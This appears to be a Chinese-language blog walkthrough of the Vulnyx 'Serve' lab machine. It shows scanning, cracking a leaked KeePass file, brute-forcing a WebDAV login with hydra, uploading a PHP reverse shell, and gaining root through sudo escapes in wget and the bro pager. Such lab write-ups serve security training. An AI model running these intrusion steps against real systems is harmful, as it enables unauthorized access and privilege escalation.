Pepster'Blog
Vulnyx-Serve-Walkthrough
城南花已开 Lv6
  2025-02-26 15:45:21   2025-05-11 17:27:09    3k 字  18 分钟  2

信息收集

服务探测

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.210  08:00:27:ef:f2:b5       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e5:e5:eb       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.029 seconds (126.17 hosts/sec). 4 responded
export ip=192.168.60.210
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.210:22
Open 192.168.60.210:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 15:45 CST
Initiating ARP Ping Scan at 15:45
Scanning 192.168.60.210 [1 port]
Completed ARP Ping Scan at 15:45, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:45
Completed Parallel DNS resolution of 1 host. at 15:45, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:45
Scanning 192.168.60.210 [2 ports]
Discovered open port 80/tcp on 192.168.60.210
Discovered open port 22/tcp on 192.168.60.210
Completed SYN Stealth Scan at 15:45, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.210
Host is up, received arp-response (0.0011s latency).
Scanned at 2025-02-26 15:45:57 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:EF:F2:B5 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

扫一下目录

得到一个提示

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,log -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.210
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,log,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.60.210/javascript/]
/notes.txt            (Status: 200) [Size: 173]
/secrets              (Status: 301) [Size: 318] [--> http://192.168.60.210/secrets/]
/webdav               (Status: 401) [Size: 461]
Progress: 1245858 / 1245864 (100.00%)
===============================================================
Finished
===============================================================

image

敏感文件泄露

那我们添加后缀再次扫描一下/secrets目录,怀疑凭证是存在kdbx

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
❯ gobuster dir -u http://$ip/secrets -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,log,kdbx -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.210/secrets
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt,log,kdbx
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 7]
/db.kdbx              (Status: 200) [Size: 2078]

下载到本地,打开一下

得到WebDAV的凭证 admin:w3bd4vXXX

根据提示后面三位需要爆破

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
❯ wget http://192.168.60.210/secrets/db.kdbx
--2025-02-26 15:59:59--  http://192.168.60.210/secrets/db.kdbx
Connecting to 192.168.60.210:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2078 (2.0K)
Saving to: ‘db.kdbx’

db.kdbx            100%[==============>]   2.03K  --.-KB/s    in 0s

2025-02-26 15:59:59 (710 MB/s) - ‘db.kdbx’ saved [2078/2078]

❯ keepass2john db.kdbx>hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dreams           (db)
1g 0:00:00:02 DONE (2025-02-26 16:00) 0.4830g/s 316.9p/s 316.9c/s 316.9C/s sunshine1..sweetpea
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ kpcli --kdb=db.kdbx
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
db/
kpcli:/> cd db/
kpcli:/db> ls
=== Groups ===
Papelera de reciclaje/
=== Entries ===
0. WebDAV

kpcli:/db> show WebDAV -f

 Path: /db/
Title: WebDAV
Uname: admin
 Pass: w3bd4vXXX
  URL:
Notes: Notas

利用crunch生成字典,hydra爆破即可

得到密码w3bd4v513

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
❯ crunch 9 9 -t w3bd4v%%% -o dic.txt
Crunch will now generate the following amount of data: 10000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 1000

crunch: 100% completed generating output
head dic.txt
w3bd4v000
w3bd4v001
w3bd4v002
w3bd4v003
w3bd4v004
w3bd4v005
w3bd4v006
w3bd4v007
w3bd4v008
w3bd4v009

❯ hydra -l admin -P dic.txt $ip http-get /webdav -I
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-26 16:10:15
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking http-get://192.168.60.210:80/webdav
[80][http-get] host: 192.168.60.210   login: admin   password: w3bd4v513
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-26 16:10:20

WebDav上传

WebDav - HackTricks

利用davtest可以测试上传的文件类型

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
❯ davtest -auth admin:w3bd4v513 -move -sendbd auto -url http://$ip/webdav
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://192.168.60.210/webdav
********************************************************
NOTE    Random string for this session: q5NHnyI1JGN
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN
********************************************************
 Sending test files (MOVE method)
PUT     txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_txt.txt
MOVE    txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt
MOVE    txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt;.txt
PUT     txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_jsp.txt
MOVE    jsp     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jsp
MOVE    jsp     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jsp;.txt
PUT     txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_php.txt
MOVE    php     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php
MOVE    php     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php;.txt
PUT     txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_shtml.txt
MOVE    shtml   SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.shtml
MOVE    shtml   SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.shtml;.txt
PUT     txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_cfm.txt
MOVE    cfm     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cfm
MOVE    cfm     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cfm;.txt
PUT     txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_asp.txt
MOVE    asp     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.asp
MOVE    asp     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.asp;.txt
PUT     txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_pl.txt
MOVE    pl      SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.pl
MOVE    pl      SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.pl;.txt
PUT     txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_html.txt
MOVE    html    SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html
MOVE    html    SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html;.txt
PUT     txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_aspx.txt
MOVE    aspx    SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.aspx
MOVE    aspx    SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.aspx;.txt
PUT     txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_jhtml.txt
MOVE    jhtml   SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jhtml
MOVE    jhtml   SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jhtml;.txt
PUT     txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN_cgi.txt
MOVE    cgi     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cgi
MOVE    cgi     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cgi;.txt
********************************************************
 Checking for test file execution
EXEC    txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt
EXEC    txt     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt;.txt
EXEC    jsp     FAIL
EXEC    php     SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php
EXEC    php     FAIL
EXEC    shtml   FAIL
EXEC    cfm     FAIL
EXEC    asp     FAIL
EXEC    pl      FAIL
EXEC    html    SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html
EXEC    html    SUCCEED:        http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html;.txt
EXEC    aspx    FAIL
EXEC    jhtml   FAIL
EXEC    cgi     FAIL
********************************************************
 Sending backdoors
** ERROR: Unable to find a backdoor for txt **
** ERROR: Unable to find a backdoor for html **

********************************************************
/usr/bin/davtest Summary:
Created: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jsp
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jsp;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.shtml
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.shtml;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cfm
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cfm;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.asp
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.asp;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.pl
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.pl;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.aspx
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.aspx;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jhtml
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.jhtml;.txt
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cgi
MOVE/PUT File: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.cgi;.txt
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.txt;.txt
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.php
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html
Executes: http://192.168.60.210/webdav/DavTestDir_q5NHnyI1JGN/davtest_q5NHnyI1JGN.html;.txt

发现可以上传php类型的文件,利用cadaver上传个webshell

BASH 
1
2
3
4
5
6
7
8
9
10
❯ cadaver http://$ip/webdav
Authentication required for webdav on server `192.168.60.210':
Username: admin
Password:
dav:/webdav/> put ../php-reverse-shell.php
Uploading ../php-reverse-shell.php to `/webdav/php-reverse-shell.php':
Progress: [=============================>] 100.0% of 5496 bytes succeeded.
dav:/webdav/> exit
Connection to `192.168.60.210' closed.

用户提权

监听端口

存在teo用户

BASH 
1
2
3
4
5
6
7
8
9
10
❯ pwncat-cs -lp 4444
[16:19:12] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[16:19:36] received connection from 192.168.60.210:46166                                                                                    bind.py:84
[16:19:36] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
[16:19:37] 192.168.60.210:46166: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@serve:/$ cat /etc/passwd |grep  "/bin/bash"
root:x:0:0:root:/root:/bin/bash
teo:x:1000:1000:teo,,,:/home/teo:/bin/bash

同时www-data拥有teo的sudo权限

可以执行wget

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
(remote) www-data@serve:/$ sudo -l
Matching Defaults entries for www-data on Serve:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on Serve:
    (teo) NOPASSWD: /usr/bin/wget
(remote) www-data@serve:/var/tmp$ echo -e '#!/bin/sh\n/bin/sh 1>&0' >aa
(remote) www-data@serve:/var/tmp$ chmod +x aa
(remote) www-data@serve:/var/tmp$ sudo -u teo /usr/bin/wget --use-askpass=/var/tmp/aa 0
teo@serve:/var/tmp$ cd ~
teo@serve:~$ cat user.txt
28bf16070abffab749a16bd11f635474

Root提权

teo用户也有sudo权限,可以执行/usr/local/bin/bro

发现是调用Bropages

其实这就是一个类似man pages的工具

可以直接提权

BASH 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
teo@serve:~$ sudo -l
Matching Defaults entries for teo on Serve:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User teo may run the following commands on Serve:
    (root) NOPASSWD: /usr/local/bin/bro
teo@serve:~$ ls -al /usr/local/bin/bro
-rwxr-xr-x 1 root root 600 Nov 10  2021 /usr/local/bin/bro
teo@serve:~$ cat /usr/local/bin/bro
#!/usr/bin/ruby2.5
#
# This file was generated by RubyGems.
#
# The application 'bropages' is installed as part of a gem, and
# this file is here to facilitate running it.
#

require 'rubygems'

version = ">= 0.a"

if ARGV.first
  str = ARGV.first
  str = str.dup.force_encoding("BINARY") if str.respond_to? :force_encoding
  if str =~ /\A_(.*)_\z/ and Gem::Version.correct?($1) then
    version = $1
    ARGV.shift
  end
end

if Gem.respond_to?(:activate_bin_path)
load Gem.activate_bin_path('bropages', 'bro', version)
else
gem "bropages", version
load Gem.bin_path("bropages", "bro", version)
end
teo@serve:~$ sudo -l
Matching Defaults entries for teo on Serve:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User teo may run the following commands on Serve:
    (root) NOPASSWD: /usr/local/bin/bro
teo@serve:~$ sudo /usr/local/bin/bro
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::NIL is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Data is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::TRUE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::FALSE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Fixnum is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Bignum is deprecated
Bro! Specify a command first!

        * For example try bro curl

        * Use bro help for more info

teo@serve:~$ sudo /usr/local/bin/bro curl
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::NIL is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Data is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::TRUE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::FALSE is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Fixnum is deprecated
/var/lib/gems/2.5.0/gems/commander-4.1.5/lib/commander/user_interaction.rb:328: warning: constant ::Bignum is deprecated
30 entries for curl -- submit your own example with "bro add curl"

# get the contents of a web page
curl http://bropages.org

        bro thanks      to upvote (133)
        bro ...no       to downvote (7)

.................................................................................................................................................

# download a file and write it to another file called myfile.html
curl -o myfile.html http://bropages.org

        bro thanks 2    to upvote (66)
        bro ...no 2     to downvote (0)

.................................................................................................................................................

# Download a file using its original filename, follow all redirects, and continue where you left off if the download previously failed
curl -LOC - http://foo.bar/file.ext

        bro thanks 3    to upvote (56)
        bro ...no 3     to downvote (0)

.................................................................................................................................................

# Get my external IP address
curl ifconfig.me/ip

# Get my remote host
curl ifconfig.me/host

# Get my user agent
curl ifconfig.me/ua

# Get port
curl ifconfig.me/port

!/bin/bash
root@serve:/home/teo# cat /root/root.txt
981f4425d4ffcb3fb2fe145463b1d476
root@serve:/home/teo#

  1. 信息收集
    1. 服务探测
    2. 敏感文件泄露
    3. WebDav上传
  2. 用户提权
  3. Root提权
  1. 信息收集
    1. 服务探测
    2. 敏感文件泄露
    3. WebDav上传
  2. 用户提权
  3. Root提权